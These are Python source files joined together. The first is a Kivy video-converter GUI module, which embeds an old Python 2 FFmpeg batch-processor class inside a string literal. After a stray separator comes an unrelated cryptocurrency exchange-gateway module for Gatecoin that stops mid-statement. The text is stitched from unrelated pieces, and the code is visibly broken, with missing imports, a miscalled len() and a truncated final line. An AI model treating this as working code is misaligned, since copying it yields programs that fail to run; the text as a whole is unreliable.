import time
from functools import partial
import traceback
import subprocess as sp
import tempfile
import re
from re import match, escape, sub
from time import sleep
from collections import defaultdict
from kivy.clock import Clock
from kivy.compat import clock
from kivy.factory import Factory
from kivy.uix.behaviors.knspace import KNSpaceBehavior
from kivy.uix.gridlayout import GridLayout
from kivy.uix.popup import Popup
from kivy.logger import Logger
from kivy.event import EventDispatcher
from kivy.properties import (NumericProperty, ReferenceListProperty,
ObjectProperty, ListProperty, StringProperty, BooleanProperty,
DictProperty, AliasProperty, OptionProperty, ConfigParserProperty)
from cplcom import config_name
from filers.tools import (str_to_float, pretty_space, pretty_time, KivyQueue,
to_bool, ConfigProperty, byteify)
from filers import root_data_path
__all__ = ('VideoConverter', )
def exit_converter():
c = VideoConverterController.converter_singleton
if c:
try:
c.stop(terminate=True)
except:
pass
try:
c.save_config()
except Exception as e:
Logger.error('Converter: {}'.format(e))
Logger.exception(e)
class VideoConverterController(EventDispatcher):
settings_path = ConfigParserProperty(
join(root_data_path, 'converter.json'), 'Filers',
'converter_settings_path', config_name)
conversion_group_settings = ListProperty([])
conversion_group_widgets = []
converter_singleton = None
converter_view = ObjectProperty(None)
container = ObjectProperty(None)
res_container = ObjectProperty(None)
settings_display = None
current_group_i = None
files = []
processed = 0
processing = False
def __init__(self, **kwargs):
super(VideoConverterController, self).__init__(**kwargs)
VideoConverterController.converter_singleton = self
self.settings_display = Factory.ConverterSettings(controller=self)
self.load_config(self.settings_path)
self.conversion_group_settings = []
self.conversion_group_widgets = []
@staticmethod
def get_window_title():
c = VideoConverterController.converter_singleton
if not c or not c.files or len(c.files) == c.processed:
return ''
s = ' - Converter'
if not c.processed:
s += ' ({})'.format(len(c.files))
else:
s += ' ({}/{})'.format(len(c.processed, c.files))
if not c.processing:
s += ' PAUSED'
return s
def log_error(self, msg=None, e=None, exc_info=None, level='error'):
q = self.converter_view.error_output.queue
l = getattr(Logger, level)
val = msg
if msg:
if e:
val = '{}: {}'.format(msg, repr(e))
l(val)
else:
l(msg)
if exc_info is not None:
Logger.error(e, exc_info=exc_info)
if val:
q.add_item(val)
def load_config(self, filename):
if not isfile(filename):
return
filename = abspath(filename)
for c in self.conversion_group_widgets[:]:
self.delete_group(c)
try:
with open(filename) as fh:
global_opt, convert_opt = json.load(fh)
global_opt, convert_opt = byteify(global_opt), byteify(convert_opt)
for k, v in global_opt.items():
setattr(self, k, v)
for d in convert_opt:
self.add_group(settings=d, show=False)
except Exception as e:
self.log_error(e=e, exc_info=sys.exc_info(), msg='Loading config')
else:
if filename:
self.settings_path = filename
def save_config(self, filename=None):
filename = filename or self.settings_path
if not filename:
return
try:
with open(filename, 'w') as fh:
json.dump(
(self.get_config_dict(), self.conversion_group_settings),
fh, sort_keys=True, indent=4, separators=(',', ': '))
except Exception as e:
self.log_error(e=e, exc_info=sys.exc_info(), msg='Loading config')
else:
if filename:
self.settings_path = filename
def ui_config(self, load, path, selection, filename):
fname = abspath(join(path, filename))
if load:
self.load_config(fname)
else:
self.save_config(fname)
def get_config_dict(self):
attrs = []
return {k: getattr(self, k) for k in attrs}
def add_group(self, settings={}, show=True):
item = ConversionGroup(controller=self)
settings = self.settings_display.get_settings(settings)
self.conversion_group_widgets.append(item)
self.conversion_group_settings.append(settings)
self.container.add_widget(item)
if show:
self.show_settings(item)
def delete_group(self, item):
self.settings_display.dismiss()
i = self.conversion_group_widgets.index(item)
del self.conversion_group_settings[i]
del self.conversion_group_widgets[i]
self.container.remove_widget(item)
def show_settings(self, item):
self.settings_display.item = item
self.settings_display.open()
def stop(self, terminate=False):
pass
def update_item_settings(self, item, src):
pass
class ConversionGroup(KNSpaceBehavior, GridLayout):
controller = ObjectProperty(None, rebind=True)
in_ex_file = StringProperty('')
out_ex_file = StringProperty('')
class ConverterSettings(KNSpaceBehavior, Popup):
controller = ObjectProperty(None, rebind=True)
item = ObjectProperty(None, allownone=True)
def get_settings(self, settings={}):
s = {}
s.update(settings)
return s
def set_settings(self, settings={}):
pass
class VideoConverter(KNSpaceBehavior, GridLayout):
def __init__(self, **kwargs):
super(VideoConverter, self).__init__(**kwargs)
def init(*largs):
self.controller = VideoConverterController(
converter_view=self, container=self.ids.container,
res_container=self.ids.res_container)
Clock.schedule_once(init, 0)
controller = ObjectProperty(None, rebind=True)
"""
unicode_type = unicode if PY2 else str
'''
Unicode type used to convert anything into unicode.
'''
ConfigProperty = partial(ConfigProperty, section='Processor',
config_name=config_name)
'''
A partially initialized :py:class:`~kivy.properties.ConfigParserProperty`.
The section name is `'Processor'` and the Config class name is
:attr:`~filers.config_name`.
'''
class Processor(GridLayout):
'''
See module description.
'''
queue = None
''' The :class:`~filers.tools.KivyQueue` with which we communicate with the
kivy event loop. The work thread sends updates to Kivy with this queue.
Following is the list of queue keys that can be sent, along with their
possible values.
`clean`: None
Sent when the threads starts.
`count`: int
Sent periodically while pre-reading the input files describing
the files read so far. It's a 5-tuple of: # output files,
# input files, # of walked directories, total size of the input
files, and a dictionary where the keys are ignored files, or
extensions types (e.g. .txt) and their values are the number of
times they were ignored.
`count_done`: int
Identical to `count`, except it's sent when the count is done.
`failure`: str
Sent when something went wrong and the threads ends. The
value is a string with the reason for the failure. Upon failure,
the controller should call stop and set itself in stopped mode.
`file_cmd`: str
Sent for every file before it is processed. It's a string
containing the full command with which FFmpeg will be called.
`file_stat`: 11-tuple
Sent after each file that has been processed (e.g. moved)
containing status information. It's a 11-tuple of: the total size
of output files processed, the estimated total size of all the
output files, the total size of input files processed, the total
size of all the input files (can change dynamically as files are
skipped), the total number of input files processed, the count of
all the input files, the total number of output files processed,
the count of all the output files, the estimated bps at which
things are done, the total time elapsed, the estimated time left.
`skipped`: str
Sent when the file is skipped due to error. The
string describes the files involved and the reason.
`done`: None
Sent when the thread has completed it's work.
'''
thread = None
''' The thread that runs our secondary thread. All disk R/W and processing
is done from that thread. See :attr:`process_thread`. Defaults to None.
'''
ffmpeg_path = ''
''' The full path to the FFmpeg executable. To find it, it looks in the
same path that :py:mod:`ffpyplayer` looks for the binaries
(`FFMPEG_ROOT` in os.environ as well as the parent directory of this file).
'''
running = False
''' Whether the thread is running. It is set to True before launching the
thread, and the thread resets it to False before exiting. Defaults to
False. See :attr:`process_thread`.
'''
finish = False
''' When set to True, it signals the thread to terminate. Defaults to
False.
'''
pause = False
''' When set to True, it signals the thread to pause. Setting to False will
un-pause. Defaults to False.
'''
report = ''
''' A text report of the files to be processed and ignored. This is
generated before any processing occurs. Defaults to `''`.
'''
error_list = []
''' A list of text items, each item representing a file that failed to be
processed. It is updated dynamically. Defaults to `[]`.
'''
success_list = []
''' A list of text items, each item representing a file that was
successfully processed. It is updated dynamically. Defaults to `[]`.
'''
input_split_pat = re.compile('''((?:[^,"']|"[^"]*"|'[^']*')+)''')
''' The compiled pattern we use to break apart the list of input files to
process. Defaults to the compiled value of `', *'`.
'''
input = ConfigProperty(u'', 'input', unicode_type)
''' The list of input files and folders to be processed. It is
a comma (plus optional spaces) separated list. File or directory names
that contain a space, should be quoted with `"`. Triple clicking on this
field will launch a file browser.
Defaults to `u''`.
'''
simple_filt = ConfigProperty(True, 'simple_filt', to_bool)
''' Whether the filter we use to filter the input files with
uses the simple common format (where * - match anything, ? match any single
char), if True. If False, it's a python regex string. Defaults to True.
'''
input_filter = ConfigProperty(u'*.avi', 'input_filter', unicode_type)
''' The filter to use to filter the input files. See
:attr:`simple_filt`. Defaults to `'*.avi'`.
'''
group_filt = ConfigProperty(u'', 'group_filt', unicode_type)
''' The matching string parts to remove to get the output
filename. If :attr:`simple_filt` is True, it uses `*` to match any group
of chars, and `?` to match a single char. If :attr:`simple_filt` is
False, it uses a python regex for the matching. This really only
makes sense with a regex. This is mostly useful when merging
files.
For example, say we have two files called `Video file1.avi`,
and `Video file2.avi`, and we wish to merge them into a new file
called `Video file.avi`. Then :attr:`group_filt` will be
`'(?<=file).+(?=\.avi)'`. This uses positive and negative lookahead
assertions to match the number, which then gets removed in
processing. Defaults to `''`.
If multiple input files match the same output filename, those files
will be merged using the :attr:`merge_type` mode.
'''
input_start = ConfigProperty(0., 'input_start', float)
''' The time in seconds to seek into the video. If specified,
the output video file will not have the first :attr:`input_start` seconds
of the original file. Defaults to `0`.
'''
input_end = ConfigProperty(0., 'input_end', float)
''' The duration of the output video file. If specified,
the output video file will start at :attr:`input_start` (or zero if not
specified) seconds and only copy the following :attr:`input_end` seconds.
If zero, it'll not cut anything. Defaults to `0`.
'''
merge_type = ConfigProperty(u'none', 'merge_type', unicode_type)
''' If multiple input files match the same output filename as
specified with :attr:`group_filt`, those files will be merged using the
mode specified here. Possible modes are `none`, `overlay`, or
`concatenate`. Defaults to `none`.
`none`
If multiple input files are specified for a single output
file, an error is raised.
`overlay`
The output video files will be overlaid, side by side, on
a single output video file. A maximum of 4 input files is
supported for any single output file.
`concatenate`
The files will be concatenated, one after another in series.
'''
out_overwrite = ConfigProperty(False, 'out_overwrite', to_bool)
''' Whether a output file will overwrite an already
existing filename with that name. If False, the file will be
considered a error and skipped. Defaults to False.
'''
out_audio = ConfigProperty(False, 'out_audio', to_bool)
''' Whether the audio should be included in the output file. If False, the
output file will only have video, not audio, Defaults to False.
'''
out_codec = ConfigProperty(u'h264', 'out_codec', unicode_type)
''' The codec of the output file. This determines whether the output will
be compressed or uncompressed. Can be one of `raw`, `h264`. Defaults to
`h264`.
`raw`
The output file will be uncompressed.
`h264`
The output file will be compressed with h264.
'''
crf = ConfigProperty(u'18', 'crf', unicode_type)
''' How much the output file should be compressed, when :attr:`out_codec`
is `h264`. The valid numbers are between `18 - 28`. A larger
number means higher compression, and typically slower. A lower
number means less compression and better quality, but a larger
output file. Defaults to 18.
'''
compress_speed = ConfigProperty(u'veryfast', 'compress_speed',
unicode_type)
''' Similar to :attr:`crf`, but less effective. The faster
the compression, the lower the output quality. In practice,
`veryfast` seems to work well. Can be one of `ultrafast`,
`superfast`, `veryfast`, `faster`, `fast`, `medium`, `slow`,
`slower`, `veryslow`. Defaults to `veryfast`.
'''
num_threads = ConfigProperty(u'auto', 'num_threads', unicode_type)
''' The number of threads FFmpeg should use. Valid values are
`0`, or `auto`, in which case FFmpeg selects the optimum number. Or
any integer. The integer should probably not be larger than the
number of cores on the machine.
'''
out_append = ConfigProperty(u'', 'out_append', unicode_type)
''' A string that gets appended to the output filename. See
:attr:`output`. Defaults to `''`.
'''
add_command = ConfigProperty(u'', 'add_command', unicode_type)
''' An additional string that could be used to add any
commands to the FFmpeg command line. Defaults to `''`.
'''
output = ConfigProperty(u'', 'output', unicode_type)
''' The output directory where the output files are saved. For
input files specified directly, they are placed directly in this
directory. For input directories, for all the files and subfiles,
their root directory specified is replaced with this directory, so
that the output will have the same tree structure as the input.
Each output filename will be a directory, followed by the input
filename without the extension, with all matches to :attr:`group_filt`
deleted. Followed by the :attr:`out_append` string and finally followed
by the extension, which is `.avi` if :attr:`out_codec` is `raw`,
otherwise it's '.mp4'. Defaults to `''`.
'''
pre_process = ConfigProperty(u'', 'pre_process', unicode_type)
'''
When specified, we run the command given in :attr:`pre_process`, where
the first instance of `{}` in :attr:`pre_process` is replaced by the
source filename (the first, if there's more than one source file for this
output file). This command is run from an internally created second
process. Example commands is::
ffprobe {}
which will run ffprobe on the input file. The output of this command will
be used with :attr:`pre_process_pat`.
'''
pre_process_pat = ConfigProperty(u'', 'pre_process_pat', unicode_type)
'''
When :attr:`pre_process` is provided, we use this pattern to process the
output of that command. For the first step, we use the
:attr:`pre_process_pat` python regex to match the output of
:attr:`pre_process`. If the output doesn't match the pattern, that file is
skipped.
If the output matches, in the next step, we call the python format method
on the final ffmpeg command that will be executed, where the arguments to
the format method is the groups of the match object generated from the
regex match. That formatted string is then used as the executed string.
'''
pause_on_skip = ConfigProperty(5, 'pause_on_skip', int)
'''
If :attr:`pause_on_skip` files have been skipped, we'll pause. If -1, we
don't pause.
'''
_last_update = 0.
''' The last time we received a file_stat queue packet or we updated the
title. '''
_last_time = 0.
''' The estimated remaining time from the last time that we received a
file_stat key in the :attr:`queue`. '''
remaining_time = StringProperty('')
''' The estimated remaining time to finish processing. '''
percent_done = NumericProperty(0.)
''' The estimated percent files done, estimated from the input/output
file sizes. '''
count_status = StringProperty('')
''' A string of the current counting status when the files are enumerated.
'''
proc_status = StringProperty('')
''' A string of the current processing status when the files are processed.
'''
ignored_list = StringProperty('')
''' A string of the input files ignored. '''
rate = StringProperty('')
''' The current byte rate at which files are being processed. '''
cmd = StringProperty('')
''' The most recent command line executed. '''
done_reason = StringProperty('')
''' The reason why processing stopped. Can be an error, or if it finished
successfully.
'''
skip_count = NumericProperty(0)
''' The total number of input files skipped. '''
error_log = StringProperty('')
''' A string of all the errors encountered so far. '''
ext_running = BooleanProperty(False)
''' Whether the processing is currently running (even when paused). '''
paused = BooleanProperty(False)
''' Whether the processing is currently paused. '''
go_wgt = ObjectProperty(None)
''' The button widget that starts processing. '''
pause_wgt = ObjectProperty(None)
''' The button widget that pauses processing. '''
def get_status(self):
skipped = ('Skipped {:d}, '.format(self.skip_count)
if self.skip_count else '')
prefix = running = ''
rate = self.rate
done_reason = self.done_reason
if rate:
prefix = ' - '
if done_reason:
dc = ('[color=00FF00]' if done_reason == 'Done!'
else '[color=FF0000]')
running = '{}{}{}[/color]'.format(prefix, dc, self.done_reason)
elif self.paused:
running = '{}[color=F7FF00]paused[/color]'.format(prefix)
elif self.ext_running:
running = '{}[color=00FF00]running[/color]'.format(prefix)
s = '{}\n{}\n{}{}{}'.format(self.count_status, self.proc_status,
skipped, self.rate, running)
return s
status = AliasProperty(get_status, None, bind=('skip_count', 'done_reason',
'count_status', 'proc_status', 'rate', 'ext_running', 'paused'))
''' A pretty string describing the current status.
'''
def get_title(self):
if self.ext_running:
paused = self.paused
if not paused:
self.remaining_time = pretty_time(max(0, self._last_time -
(time.clock() - self._last_update)))
return ' Processing - {}'.format(self.remaining_time)
self._last_update = time.clock()
return ' Processing - {}, Paused'.format(self.remaining_time)
else:
return ''
return ' Processing - {}'.format('') if self.ext_running else ''
window_title = AliasProperty(get_title, None)
''' The window title when this widget has focus.
'''
def __init__(self, **kwargs):
super(Processor, self).__init__(**kwargs)
self.queue = KivyQueue(Clock.create_trigger(self.read_queue))
self._last_update = time.clock()
if 'FFMPEG_ROOT' in os.environ and\
exists(join(os.environ['FFMPEG_ROOT'], 'bin')):
base_path = abspath(join(os.environ['FFMPEG_ROOT'], 'bin'))
else:
base_path = abspath(dirname(dirname(__file__)))
ffmpeg_path = join(base_path, 'ffmpeg')
if exists(ffmpeg_path + '.exe') and isfile(ffmpeg_path + '.exe'):
ffmpeg_path += '.exe'
elif not (exists(ffmpeg_path) and isfile(ffmpeg_path)):
ffmpeg_path = ''
if not ffmpeg_path:
logging.exception('Processor: Cannot find ffmpeg binary.')
self.ffmpeg_path = ffmpeg_path
def __del__(self):
self.stop()
def read_queue(self, *largs):
'''
The method that is called by the Kivy thread when it's notified by the
internal thread of updates. It reads the :attr:`queue` and process any
waiting updates.
'''
queue = self.queue
while 1:
try:
key, val = queue.get()
except KivyQueue.Empty:
return
if key == 'failure':
self.done_reason = val
self.go_wgt.state = 'normal'
elif key == 'clean':
self.count_status = ''
self.remaining_time = ''
self.percent_done = 0.
self.ignored_list = ''
self.rate = ''
self.cmd = ''
self.done_reason = ''
self.error_log = ''
self.skip_count = 0
elif key.startswith('count'):
c_out, count_in, dir_count, size, ignored = val
count_done = ''
if key == 'count_done':
count_done = ' [color=00FF00]DONE![/color]'
ig = ''
if ignored:
ig = ('(ignored [color=FF00C4]{:d}[/color]) '
.format(sum(ignored.values())))
bg = '[color=00FF00]'
by = '[color=F7FF00]'
a = '[/color]'
self.count_status = ('Counting: {}{:d}{} files &bl;{}{}{}&br;,'
' {}{:d}{} directories {}--> {}{:d}{} files.{}'.format(bg,
count_in, a, by, pretty_space(size), a, by, dir_count, a, ig,
by, c_out, a, count_done))
self.ignored_list = '\n'.join(['{}:\t\t{:d}'.format(k, v)
.expandtabs() for k, v in dict(ignored).iteritems()])
elif key == 'file_cmd':
self.cmd = val
elif key == 'done':
self.done_reason = 'Done!'
self.go_wgt.state = 'normal'
elif key == 'file_stat':
self._last_time = val[-1]
self._last_update = time.clock()
self.remaining_time = pretty_time(val[-1])
self.percent_done = val[2] / float(val[3])
bg = '[color=00FF00]'
by = '[color=F7FF00]'
a = '[/color]'
self.proc_status = ('Processing: {}{:d}{} files &bl;{}{}{}&br;'
' --> {}{:d}{} &bl;{}{}{} / {}{}{}&br; '.format(by, val[4], a,
by, pretty_space(val[2]), a, bg, val[6], a, bg,
pretty_space(val[0]), a, bg, pretty_space(val[1]), a))
self.rate = ('[color=CDFF00]{}, {} sec[/color]'.
format(pretty_space(val[-3], is_rate=True),
pretty_time(val[-2])))
elif key == 'skipped':
self.error_log += '\n\n{}'.format(val)
self.skip_count += 1
if self.skip_count == self.pause_on_skip:
self.pause_wgt.state = 'down'
def on_keyboard_down(self, keyboard, keycode, text, modifiers):
''' Method called by the Kivy thread when a key in the keyboard is
pressed.
'''
if keycode[1] == 'spacebar':
self.pause_wgt.state = ('down' if self.pause_wgt.state ==
'normal' else 'normal')
elif keycode[1] == 'enter':
self.go_wgt.state = 'down'
elif keycode[1] == 'escape':
self.go_wgt.state = 'normal'
else:
return False
return True
def on_keyboard_up(self, keyboard, keycode):
''' Method called by the Kivy thread when a key in the keyboard is
released.
'''
return False
def save_report(self):
''' Saves a report of what was processed up to now. See
:attr:`report`, :attr:`error_list`.
The report includes the list of files to be processed, and once
processing started, also the list of files that failed.
If :attr:`output` is a directory, the
file will be saved there, otherwise it's saved to the users main
directory. The report filename starts with ffmpeg_process_report and
ends with .txt.
'''
odir = self.output
if not isdir(odir):
odir = dirname(odir)
if (not odir) or not isdir(odir):
odir = expanduser('~')
odir = abspath(odir)
(fd, _) = tempfile.mkstemp(suffix='.txt',\
prefix='ffmpeg_process_report_', dir=odir)
try:
f = os.fdopen(fd, 'wb')
except:
(fd, _) = tempfile.mkstemp(suffix='.txt',
prefix='ffmpeg_process_report_', dir=expanduser('~'))
try:
f = os.fdopen(fd, 'wb')
except:
return
f.write(self.report)
f.write('Success list:\n')
for s in self.success_list:
f.write(s)
f.write('\n')
f.write('Error list:\n')
for err in self.error_list:
f.write(err)
f.write('\n')
f.close()
def start(self):
''' Starts the the processing.
This launches the second thread that does the disk I/O and starts
processing the files according to the settings. If it is already
running, it does nothing.
:return:
True, if it successfully started, False otherwise.
'''
if self.running and self.thread and self.thread.is_alive():
return
self.stop()
self.running = True
try:
self.thread = Thread(target=self.process_thread, name='Processor')
self.thread.start()
except:
logging.error('Processor: Thread failed:\n' +
traceback.format_exc())
self.stop()
return False
return True
def toggle_pause(self):
''' Changes whether the thread is paused or running to the opposite
of its current state.
'''
self.pause = not self.pause
return self.pause
def stop(self):
''' Asks the processing thread started with :meth:`start` to end.
This will cause processing to stop.
'''
self.finish = True
while self.running and self.thread and self.thread.is_alive():
time.sleep(0.05)
self.running = False
self.thread = None
self.finish = False
def enumerate_files(self):
''' Returns an iterator that walks all the input files and directories
to return the files to be processed according to the current
configuration.
It walks all the input files and directories, and for every input file
generates a corresponding output file using the specified output.
Multiple input files can be assigned to a single output file, in which
case they are merged according to :attr:`merge_type`.
:returns:
A 5-tuple of: a dictionary where keys are output files and
values is a list of 2-tuples where each 2-tuple is a input file and
it size. The number of files processed, the number of directories
processed, the total size of the files processed, and a dictionary
of ignored files (see `count` in :attr:`queue`). On the final
iteration, it returns a sorted list of 2-tuples of the output files
dictionary items.
:raises FilerException:
When the the config is inavlid an exception is raised.
'''
files_out = defaultdict(list)
odir = self.output
if not isdir(odir):
raise FilerException('{} is not an output directory.'.\
format(self.output))
odir = abspath(odir)
ext_out = '.mp4' if self.out_codec == 'h264' else '.avi'
filt_in = self.input_filter
filt_group = self.group_filt
if self.simple_filt:
filt_in = sub(escape('\\?'), '.', sub(escape('\\*'), '.*',
escape(filt_in)))
filt_group = sub(escape('\\?'), '.', sub(escape('\\*'), '.*',
escape(filt_group)))
try:
filt_in = re.compile(filt_in)
filt_group = re.compile(filt_group)
except:
raise FilerException('invalid filtering pattern')
apnd = self.out_append
ignored = defaultdict(int)
src_list = [f.strip(''', '"''') for f in
self.input_split_pat.split(self.input)]
src_list = [abspath(f) for f in src_list if f]
count = 0
dir_count = 0
size = 0
for f in src_list:
if isfile(f) and match(filt_in, f):
sz = getsize(f)
files_out[join(odir, sub(filt_group, '',\
splitext(split(f)[1])[0]) + apnd + ext_out)].append((f, sz))
count += 1
size += sz
yield files_out, count, dir_count, size, ignored
elif isdir(f):
dir_count -= 1
for root, _, files in os.walk(f):
dir_count += 1
if not files:
continue
root = abspath(root)
sdir = root.replace(f, '').strip(sep)
for filename in files:
filepath = join(root, filename)
if isfile(filepath) and match(filt_in, filepath):
sz = getsize(filepath)
files_out[join(odir, sdir, sub(filt_group, '',\
splitext(filename)[0]) + apnd + ext_out)].\
append((filepath, sz))
count += 1
size += sz
else:
fname, ext = splitext(filename)
ignored[ext if ext else fname] += 1
yield files_out, count, dir_count, size, ignored
else:
fname, ext = splitext(f)
ignored[ext if ext else fname] += 1
yield files_out, count, dir_count, size, ignored
yield sorted(files_out.items(), key=lambda x: x[0]), count, dir_count,\
size, ignored
def gen_cmd(self, files):
'''
Takes a list of input / output files and returns the full FFmpeg
command for each output file.
:Parameters:
`files`: list
The list of tuples of all the input / output files.
It is the list of files returned in the first element in the
tuple by :attr:`enumerate_files`.
:return:
A list of tuples. Each 5-tuple is the full FFmpeg command line
(string), the total size of the input files for that output
file, the number of input files, the first input file for this
output file, and the output file name.
'''
merge_type = self.merge_type
audio = self.out_audio
s = self.input_start
e = self.input_end
seeking = ''
if s:
seeking = ' -ss {:.3f}'.format(s)
if e:
seeking = '{} -t {:.3f}'.format(seeking, e)
opts = ' {}'.format(self.add_command) if self.add_command else ''
if self.out_codec == 'h264':
opts += ' -vcodec libx264 -preset {} -crf {}'.\
format(self.compress_speed, self.crf)
elif self.out_codec == 'raw':
opts += ' -vcodec rawvideo'
if not audio:
opts += ' -an'
opts += ' -y' if self.out_overwrite else ' -n'
opts = '{} -threads {}'.format(opts, self.num_threads if
self.num_threads != 'auto' else '0')
res = []
for dst, src_list in files:
src = sorted([f[0] for f in src_list])
inames = ' -i "{}"'.format('" -i "'.join(src))
merge_cmd = ''
if merge_type == 'overlay' and len(src) > 1:
merge_cmd = ' -filter_complex '
if len(src) == 2:
merge_cmd = ' -filter_complex "[0:0]pad=iw*2:ih[a];'\
'[a][1:0]overlay=w" -shortest'
elif len(src) == 3:
merge_cmd = ' -filter_complex "[0:0]pad=iw*2:ih*2[a];'\
'[a][1:0]overlay=w[b];[b][2:0]overlay=0:h" -shortest'
elif len(src) == 4:
merge_cmd = ' -filter_complex "[0:0]pad=iw*2:ih*2[a];'\
'[a][1:0]overlay=w[b];[b][2:0]overlay=0:h[c];[c][3:0]'\
'overlay=w:h" -shortest'
elif merge_type == 'concatenate' and len(src) > 1:
if audio:
base_str = ('[{}:0] [{}:1] ' * len(src)).format(\
*[int(i / 2) for i in range(2 * len(src))])
merge_cmd = ' -filter_complex \'{} concat=n={:d}:v=1:a=1 '\
'[v] [a]\' -map \'[v]\' -map \'[a]\''.\
format(base_str, len(src))
else:
base_str = ('[{}:0] ' * len(src)).format(*range(len(src)))
merge_cmd = ' -filter_complex \'{} concat=n={:d}:v=1 '\
'[v]\' -map \'[v]\''.format(base_str, len(src))
res.append(('"{}"{}{}{}{} "{}"'.format(self.ffmpeg_path, inames,
seeking, merge_cmd, opts, dst), sum([f[1] for f in src_list]),
len(src), src[0], dst))
return res
def process_thread(self):
''' The thread that processes the input / output files. It communicates
with the outside world using :attr:`queue`.
Upon exit, it sets :attr:`running` to False.
'''
queue = self.queue
put = queue.put
clock = time.clock
merge_type = self.merge_type
put('clean', None)
pre = self.pre_process
pre_pat = self.pre_process_pat
try:
pre_pat = re.compile(pre_pat)
except Exception, e:
put('failure', e.message)
self.running = False
return
itr = self.enumerate_files()
try:
s = time.clock()
while True:
if self.finish:
raise FilerException('Processing terminated by user.')
files, count, dir_count, size, ignored = itr.next()
e = time.clock()
if e - s > 0.3:
s = e
put('count', (len(files), count, dir_count, size, ignored))
except StopIteration:
pass
except FilerException, e:
put('failure', e.message)
self.running = False
return
self.error_list = []
self.success_list = []
file_str = '\n'.join(['{} <-- {}'.format(k, ','.join([vv[0] for vv in\
v])) for k, v in files])
ignored_str = '\n'.join(['{}:{:d}'.format(k, v) for k, v in
dict(ignored).iteritems()])
self.report = 'File list:\n{}\nIgnored list:\n{}\n'.format(file_str,
ignored_str)
put('count_done', (len(files), count, dir_count, size, ignored))
for k, v in files:
if len(v) > 1 and merge_type == 'none':
put('failure', 'More than one input file was provided for a '\
'single output file, and merge was not specified.')
self.running = False
return
if len(v) > 1 and pre:
put('failure', 'More than one input file was provided for a '\
'single output file, and pre-processing was not specified.')
self.running = False
return
elif len(v) > 4 and merge_type == 'overlay':
put('failure', 'More than 4 input files was provided for a '\
'single output file - not currently supported for overlay.'
)
self.running = False
return
error_list = self.error_list
success_list = self.success_list
out_size_done = 0
out_size_total = 0
in_size_done = 0
in_size_total = size
in_count_done = 0
in_count_total = count
out_count_done = 0
out_count_total = len(files)
bps = 0.
time_total = 0.
elapsed = 0.0000001
ts = clock()
t_left = 0
for cmd, fsize, fcount, src, dst in self.gen_cmd(files):
try:
if self.finish or self.pause:
elapsed = clock() - ts
while self.pause and not self.finish:
sleep(.1)
if self.finish:
put('failure', 'Processing terminated by user.')
self.running = False
return
ts = clock()
d = dirname(dst)
if not exists(d):
try:
makedirs(d)
except Exception as e:
pass
if pre:
info = sp.STARTUPINFO()
info.dwFlags = sp.STARTF_USESHOWWINDOW
info.wShowWindow = sp.SW_HIDE
sprocess = sp.Popen(pre.format(src), stdout=sp.PIPE,
stderr=sp.PIPE, stdin=sp.PIPE, startupinfo=info)
sprocess.stdin.close()
stdoutdata, stderrdata = sprocess.communicate()
if sprocess.wait():
raise FilerException('Pre process error: \n{}\n{}'.\
format(stdoutdata, stderrdata))
m = match(pre_pat, stdoutdata)
if not m:
raise FilerException('Match not found in pre'
'-processing output')
cmd = cmd.format(*m.groups())
put('file_cmd', cmd)
info = sp.STARTUPINFO()
info.dwFlags = sp.STARTF_USESHOWWINDOW
info.wShowWindow = sp.SW_HIDE
sprocess = sp.Popen(cmd, stdout=sp.PIPE, stderr=sp.PIPE,
stdin=sp.PIPE, startupinfo=info)
sprocess.stdin.close()
stdoutdata, stderrdata = sprocess.communicate()
if sprocess.wait():
raise FilerException('Process error: \n{}\n{}'.\
format(stdoutdata, stderrdata))
out_size_done += getsize(dst)
in_size_done += fsize
in_count_done += fcount
out_count_done += 1
time_total = clock() - ts + elapsed
bps = in_size_done / time_total
out_size_total = int(in_size_total / float(in_size_done) *
out_size_done)
t_left = (in_size_total - in_size_done) / bps
put('file_stat', (out_size_done, out_size_total, in_size_done,
in_size_total, in_count_done, in_count_total,
out_count_done, out_count_total, bps,
time_total, t_left))
success_list.append('{}\n{}'.format(cmd, stderrdata))
except Exception as e:
in_size_total -= fsize
msg = '{}\n{}'.format(cmd, e.message)
error_list.append(msg)
put('skipped', msg)
put('done', None)
self.running = False
"""
|
gatecoin.py
|
from befh.restful_api_socket import RESTfulApiSocket
from befh.exchanges.gateway import ExchangeGateway
from befh.market_data import L2Depth, Trade
from befh.util import Logger
from befh.instrument import Instrument
from befh.clients.sql_template import SqlClientTemplate
import time
import threading
from functools import partial
from datetime import datetime
class ExchGwApiGatecoin(RESTfulApiSocket):
"""
Exchange gateway RESTfulApi
"""
def __init__(self):
RESTfulApiSocket.__init__(self)
@classmethod
def get_trade_timestamp_field_name(cls):
return 'transactionTime'
@classmethod
def get_bids_field_name(cls):
return 'bids'
@classmethod
def get_asks_field_name(cls):
return 'asks'
@classmethod
def get_order_book_price_field_name(cls):
return 'price'
@classmethod
def get_order_book_volume_field_name(cls):
return 'volume'
@classmethod
def get_trade_side_field_name(cls):
return 'way'
@classmethod
def get_trade_id_field_name(cls):
return 'transactionId'
@classmethod
def get_trade_price_field_name(cls):
return 'price'
@classmethod
def get_trade_volume_field_name(cls):
return 'quantity'
@classmethod
def get_order_book_link(cls, instmt):
return "https://api.gatecoin.com/Public/MarketDepth/%s" % instmt.get_instmt_code()
@classmethod
def get_trades_link(cls, instmt):
if int(instmt.get_exch_trade_id()) > 0:
return "https://api.gatecoin.com/Public/Transactions/%s?since=%s" % \
(instmt.get_instmt_code(), instmt.get_exch_trade_id())
else:
return "https://api.gatecoin.com/Public/Transactions/%s" % \
(instmt.get_instmt_code())
@classmethod
def parse_l2_depth(cls, instmt, raw):
"""
Parse raw data to L2 depth
:param instmt: Instrument
:param raw: Raw data in JSON
"""
keys = list(raw.keys())
if cls.get_bids_field_name() in keys and \
cls.get_asks_field_name() in keys:
l2_depth = L2Depth()
# Bids
bids = raw[cls.get_bids_field_name()]
bid_level = -1
for bid in bids:
price = bid[cls.get_order_book_price_field_name()]
volume = bid[cls.get_order_book_volume_field_name()]
if bid_level == -1 or l2_depth.bids[bid_level].price != price:
bid_level += 1
if bid_level < 5:
l2_depth.bids[bid_level].price = float(price)
else:
break
l2_depth.bids[bid_level].volume += float(volume)
# Asks
asks = raw[cls.get_asks_field_name()]
ask_level = -1
for ask in asks:
price = ask[cls.get_order_book_price_field_name()]
volume = ask[cls.get_order_book_volume_field_name()]
if ask_level == -1 or l2_depth.asks[ask_level].price != price:
ask_level += 1
if ask_level < 5:
l2_depth.asks[ask_level].price = float(price)
else:
break
l2_depth.asks[ask_level].volume += float(volume)
return l2_depth
else:
raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
